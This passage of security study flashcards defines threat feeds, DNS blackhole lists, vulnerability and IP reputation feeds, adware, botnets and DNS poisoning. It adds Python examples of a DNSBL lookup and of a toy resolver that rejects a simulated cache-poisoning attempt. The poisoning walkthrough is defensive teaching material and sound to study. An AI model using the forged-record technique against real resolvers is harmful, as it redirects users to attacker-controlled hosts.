Real-Time Updates: Continuously refreshed with the latest threat intelligence, including new malware, attack patterns, and compromised IPs or domains.
Indicators of Compromise (IoCs): Provides details like malicious IP addresses, domain names, file hashes, and suspicious URLs.
Actionable Intelligence: Helps security teams or automated systems take proactive measures, such as blocking traffic from certain IPs or tightening defenses against specific threats.
Integration with Security Tools: Often integrated into SIEM (Security Information and Event Management) systems, firewalls, or intrusion detection/prevention systems (IDS/IPS).

38
Q

what is a real-time blackhole list

A

A Real-Time Blackhole List (RBL), also known as a DNS-based Blackhole List (DNSBL), is a database or list of IP addresses that are known to send spam, malicious traffic, or engage in suspicious activities. These lists are used to prevent unwanted traffic from reaching systems or networks in real time.

Key Features:
Real-Time Monitoring: The list is dynamically updated as new malicious IPs are identified, and entries expire once an IP stops misbehaving.
Blacklisting: IP addresses associated with spamming, malware, or botnet activity are added to the list; many lists also cover dynamic or residential address ranges that should never send mail directly.
DNS Queries: A mail server checks an IP by reversing its octets and querying a name under the list’s zone (for 203.0.113.45 and the zone dnsbl.example, the name 45.113.0.203.dnsbl.example). An A record in 127.0.0.0/8 means “listed”, with the last octet often encoding the reason; NXDOMAIN means “not listed”. Lists have false positives, so the result is usually one scoring signal rather than a hard reject.
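
As an added example (not from the original flashcards), the DNSBL lookup mechanism in code: building the reversed-octet query name, interpreting the answer per the RFC 5782 conventions, and a check function that takes the resolver as a parameter so the example runs offline against a constructed zone. The dnsbl.example zone and its two entries are made up; resolve_via_dns is the only piece that touches the network and is not called by the offline check.

```python
import ipaddress
import socket
from typing import Callable, Optional


def dnsbl_query_name(ip: str, zone: str) -> str:
    """Build the DNSBL lookup name per RFC 5782: the IPv4 octets reversed, under
    the list's zone. 203.0.113.45 checked against 'dnsbl.example' becomes
    '45.113.0.203.dnsbl.example'."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this helper handles IPv4 lists only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def is_listed(answer: Optional[str]) -> bool:
    """A listing is an A record inside 127.0.0.0/8 (the low octet often encodes
    the reason, which is list specific); NXDOMAIN (here: None) means not listed.
    Anything outside 127/8 is treated as an error, never as a listing."""
    if answer is None:
        return False
    return ipaddress.ip_address(answer) in ipaddress.ip_network("127.0.0.0/8")


def check_ip(ip: str, zone: str, resolve: Callable[[str], Optional[str]]) -> bool:
    """resolve() is injected so the check can run offline; pass resolve_via_dns
    for a real lookup."""
    return is_listed(resolve(dnsbl_query_name(ip, zone)))


def resolve_via_dns(name: str) -> Optional[str]:
    """Real lookup through the system resolver; NXDOMAIN surfaces as gaierror."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


# Constructed stand-in for a DNSBL zone (not a real list). RFC 5782 requires every
# list to answer for the test address 127.0.0.2, so that entry is included.
FAKE_ZONE_DATA = {
    "2.0.0.127.dnsbl.example": "127.0.0.2",
    "45.113.0.203.dnsbl.example": "127.0.0.4",
}


def fake_resolve(name: str) -> Optional[str]:
    return FAKE_ZONE_DATA.get(name)
```

Before trusting a real list, query its 127.0.0.2 test entry through the same resolver the mail server uses; some lists refuse or answer differently for public resolvers, and a check that silently returns “not listed” for everything is worse than no check.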

39
Q

what is a vulnerability feed

A

A vulnerability feed is a real-time stream of data that provides information on newly discovered or existing vulnerabilities in software, hardware, and systems. Organizations use this information to stay informed about potential security weaknesses that could be exploited by attackers and to prioritize patching or mitigating those vulnerabilities.

Key Features of Vulnerability Feeds:
Real-Time Updates: Continuously updated with the latest vulnerability disclosures from various sources, including vendors, security researchers, and public databases.
CVE Information: Often includes Common Vulnerabilities and Exposures (CVE) identifiers, which are standardized references for specific vulnerabilities.
Severity Ratings: Provides vulnerability severity ratings, such as those based on the CVSS (Common Vulnerability Scoring System), helping organizations prioritize their responses.
Associated Threats: Some feeds also include data on exploits actively targeting specific vulnerabilities, helping organizations understand the risk.

40
Q

what is an IP reputation feed

A

An IP reputation feed is a real-time data feed that provides information about the reputation of specific IP addresses based on their past or current behavior on the internet. This feed is used by security systems to help determine whether an IP address is involved in malicious activities, such as spamming, malware distribution, phishing, or botnet participation.

Key Features of an IP Reputation Feed:
Reputation Score: IP addresses are assigned scores or ratings that reflect their likelihood of being associated with malicious or suspicious activity.
Historical Behavior: The feed tracks the past activities of an IP address, such as sending spam or hosting malware.
Geolocation and Ownership: Information about the geographical location and ownership of the IP address may be included to provide additional context.
Real-Time Updates: IP reputation feeds are continuously updated to reflect the latest information, ensuring that new malicious IP addresses are flagged quickly.

41
Q

what is adware

A

Adware is a type of software that automatically delivers advertisements to a user’s device, often without their consent. It is typically installed unknowingly alongside other software or downloaded through compromised websites. While not always malicious, adware can be intrusive and may pose privacy risks or lead to security vulnerabilities.

Key Characteristics of Adware:
Displays Ads: The primary purpose is to display advertisements, often in the form of pop-ups, banners, or redirections to sponsored websites.
Bundled Installation: It often comes packaged with legitimate software or disguised as something useful, and users may unintentionally install it.
Intrusive Behavior: Adware can bombard users with excessive ads, slowing down system performance and interrupting normal browsing activities.
Data Collection: Some adware collects user data, such as browsing habits, search queries, and location, to display targeted ads or sell the data to third parties.
Potential Security Risks: While not as harmful as malware, some adware can open the door to more serious infections or compromise user privacy.

42
Q

what is a botnet

A

A botnet is a network of compromised computers or devices (called bots or zombies) that are controlled remotely by a cybercriminal, often without the knowledge of the device’s owner. Botnets are typically used to carry out large-scale malicious activities, such as distributed denial-of-service (DDoS) attacks, spamming, data theft, or cryptocurrency mining.

Key Characteristics of a Botnet:
Remote Control: The devices in a botnet are controlled by a bot herder (the attacker) through command-and-control (C2) servers or peer-to-peer networks.
Infection Methods: Devices are infected through malware, often via phishing emails, malicious downloads, or vulnerabilities in software. Once infected, they become part of the botnet.
Large Scale: A botnet can range from a few devices to millions, enabling powerful coordinated attacks.

43
Q

what is DNS poisoning/spoofing

A

DNS poisoning, also known as DNS spoofing or cache poisoning, is a cyber attack that manipulates the Domain Name System (DNS) so that users are sent to attacker-controlled hosts instead of the legitimate sites they intended to visit. The attacker gets false records into a resolver’s cache (or into a client’s hosts file or resolver settings), so every later lookup of that name returns the wrong IP address until the entry expires.

Key Characteristics of DNS Poisoning:
Manipulation of DNS Records: Attackers inject forged answers, either by racing the legitimate reply with a spoofed response that matches the query’s transaction ID and source port, or by slipping extra “additional” records for unrelated names into an otherwise genuine reply.
Deceptive Redirection: Users may be redirected to fraudulent websites that steal credentials, distribute malware, or serve unwanted ads, while the address bar shows the correct name.
Temporary or Permanent: Poisoning a cache is temporary (it lasts for the TTL of the forged record) but affects everyone behind that resolver; it becomes persistent if the attacker controls the DNS server or the domain’s registrar account.
Mitigations: Resolvers randomize transaction IDs and source ports and discard out-of-bailiwick records; DNSSEC lets a validating resolver reject forged answers outright; HTTPS with certificate validation limits what a redirected victim can be tricked into, since the attacker’s server will not hold a valid certificate for the real name.
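
As an added example (not from the original flashcards), a simplified model of a stub resolver that shows both halves of the defence above: a response is only accepted if its transaction ID matches an outstanding query, and cached records are dropped unless they are “in bailiwick” (about the queried name or one of its ancestors). The poisoning attempt answers a query for the attacker’s own name truthfully while smuggling in a record for www.bank.example. The names, addresses, and the bailiwick rule are simplifications constructed for the example; real resolvers also randomize the source port and apply finer-grained rules.

```python
import random
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Record:
    name: str
    rtype: str
    value: str


@dataclass
class Response:
    txid: int                  # must echo the query's transaction ID
    qname: str                 # the question being answered
    answers: List[Record]
    additional: List[Record]   # "helpful" extra records, the classic poisoning vehicle


def in_bailiwick(record_name: str, qname: str) -> bool:
    """Simplified bailiwick rule: only cache records for the queried name or one
    of its ancestors (e.g. the zone's own NS records). A record for an unrelated
    name is discarded no matter how it was delivered."""
    record_name, qname = record_name.lower(), qname.lower()
    return record_name == qname or qname.endswith("." + record_name)


class StubResolver:
    def __init__(self, enforce_bailiwick: bool):
        self.enforce_bailiwick = enforce_bailiwick
        self.cache = {}      # (name, rtype) -> value
        self.pending = {}    # qname -> txid we are waiting on

    def send_query(self, qname: str) -> int:
        txid = random.getrandbits(16)   # real resolvers also randomize the source port
        self.pending[qname] = txid
        return txid

    def accept(self, resp: Response) -> bool:
        """Accept a response only if it answers an outstanding query with the right TXID."""
        if self.pending.get(resp.qname) != resp.txid:
            return False    # unsolicited or wrong TXID: a blind spoof attempt
        del self.pending[resp.qname]
        for rec in resp.answers + resp.additional:
            if self.enforce_bailiwick and not in_bailiwick(rec.name, resp.qname):
                continue    # the poison is dropped here
            self.cache[(rec.name.lower(), rec.rtype)] = rec.value
        return True

    def lookup(self, name: str, rtype: str = "A") -> Optional[str]:
        return self.cache.get((name.lower(), rtype))


def poisoning_attempt(enforce_bailiwick: bool) -> Optional[str]:
    """The attacker lures the resolver into querying a name they control, then
    answers it truthfully while slipping in an extra record for www.bank.example.
    Returns whatever the resolver now believes about www.bank.example."""
    resolver = StubResolver(enforce_bailiwick)
    txid = resolver.send_query("lure.attacker.example")   # the attacker sees this: they are authoritative
    forged = Response(
        txid=txid,
        qname="lure.attacker.example",
        answers=[Record("lure.attacker.example", "A", "198.51.100.9")],
        additional=[Record("www.bank.example", "A", "203.0.113.45")],   # the poison
    )
    if not resolver.accept(forged):
        raise RuntimeError("legitimate-looking response was rejected")
    return resolver.lookup("www.bank.example")


def blind_spoof_attempt() -> bool:
    """Without seeing the query, an attacker has to guess the TXID; a wrong guess is dropped."""
    resolver = StubResolver(enforce_bailiwick=True)
    txid = resolver.send_query("www.bank.example")
    wrong = Response(txid ^ 1, "www.bank.example",
                     [Record("www.bank.example", "A", "203.0.113.45")], [])
    return resolver.accept(wrong)
```

A 16-bit transaction ID alone gives the blind attacker one chance in 65,536 per forged packet, which is why the 2008 Kaminsky attack (many queries for random subdomains, each a fresh guess) forced resolvers to randomize the source port as well; the bailiwick check is what stops the non-blind variant shown in poisoning_attempt, and DNSSEC validation closes both.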